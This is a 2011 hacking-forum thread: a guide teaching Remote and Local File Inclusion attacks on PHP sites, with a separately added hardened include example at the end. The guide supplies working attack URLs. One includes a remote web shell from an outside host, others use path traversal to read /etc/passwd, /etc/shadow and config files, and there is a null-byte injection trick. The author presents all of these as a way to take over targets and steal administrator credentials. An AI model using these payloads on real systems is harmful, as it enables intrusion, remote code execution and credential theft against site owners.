ShadowNET Posted March 20, 2011

This is a guide I wrote for my board: www.leethackers.org.

What is RFI?

RFI, also known as Remote File Inclusion, can be used to execute PHP code from a remote host. This can be really useful. For example:

www.target.com/index.php?page=index.txt

Here we see it takes the text of the text file "index.txt" and places it into index.php. It is the include() PHP function. Sadly, no one thought about the security while doing this. As I already said, it gets the text of index.txt and places the code into index.php. What if we change index.txt to a remote server, for example:

www.t00ls.org/r57.txt <--- This is a web shell.

So basically, it should look like this now:

www.target.com/index.php?page=www.t00ls.org/r57.txt

If the target is vulnerable, you should see a web shell on the page without injecting it or uploading a file! That easy.

What is LFI?

LFI, also known as Local File Inclusion, can be used to display sensitive information from a specified file on the webhost. The concept is almost the same as RFI. The only difference is that the files are on localhost. For example, we have this page:

www.target.com/index.php?page=contact.php

So it shows the contact.php form. Now let us try this:

www.target.com/index.php?page=../../../etc/passwd

If you get a page with users, then this page is vulnerable to LFI. The passwords are displayed as 'x's though. Try to check the 'shadow' file. So do this:

www.target.com/index.php?page=../../../etc/shadow

This file is normally not readable for the users. It is only readable for 'root'. What you could try is getting the config.php file that is mostly located in the include folder. So:

www.target.com/index.php?page=./include/config.php

If you have got the details for the DB (server, username, password, database) you can connect to it and get the administrator password from the users or w.e table.

Hope this small explanation helped you a bit!
buffy Posted March 20, 2011

Nice work dude!
dr0p Posted March 25, 2011

/proc/self/environ is also very useful for LFI ;D RFI and LFI are pretty rare now though.

Edited March 25, 2011 by dr0p
ShadowNET (Author) Posted March 25, 2011

For some reason I cannot edit my post.. well, here is a small update...

PHP coders usually use this code:

<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
    $color = $_GET['COLOR'];
include( $color . '.php' );
?>

Now, they think they're safe because the file extension must be ".php". WRONG! All you have to do is put '' on the end of the URL; this will ignore including 'php' or any other file extension. This is called null byte injection. e.g.

www.target.com/index.php?page=../../../etc/shadow%00

I am willing to post this image, because I noticed on IPBoard forums it is getting replaced. So just add this: after the URL. Just after /etc/shadow[NULL BYTE INJ HERE]
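A hardened form of the include pattern quoted in the post above, as an added example that is not code from the thread or its author. The page names, the pages/ directory and the ini settings are assumptions; the point is that the request parameter is only ever used as a key into a fixed map, so "../", "%00" and remote URLs never reach include().

```php
<?php
// Added example: defensive replacement for
//   include($_GET['COLOR'] . '.php');
// Instead of building a filesystem path from user input, the request
// parameter selects an entry from a fixed allowlist. Unknown values fall
// back to a default page rather than reaching include() at all.

// Assumed set of includable pages (constructed for this example).
const ALLOWED_PAGES = [
    'blue'    => 'blue.php',
    'red'     => 'red.php',
    'contact' => 'contact.php',
];

// Assumed directory that holds the includable files, fixed at deploy time.
const PAGES_DIR = __DIR__ . '/pages';

/**
 * Map the raw request value to a safe absolute path.
 * Only exact allowlist keys are accepted; anything else (traversal
 * sequences, null bytes, URLs, unexpected extensions) selects the default.
 */
function resolve_page(?string $requested): string
{
    $key = 'blue'; // default page
    if ($requested !== null && array_key_exists($requested, ALLOWED_PAGES)) {
        $key = $requested;
    }
    return PAGES_DIR . '/' . ALLOWED_PAGES[$key];
}

// Defence in depth: with remote includes disabled in php.ini
// (allow_url_include=Off), an include() that somehow received a URL would
// still fail. Checking it here makes the expectation visible in logs.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('warning: allow_url_include is enabled; RFI risk');
}

include resolve_page($_GET['COLOR'] ?? null);
```

Null bytes in include paths have been rejected by PHP itself since 5.3.4, but the allowlist above does not depend on that: it never passes the user-supplied string to the filesystem in the first place.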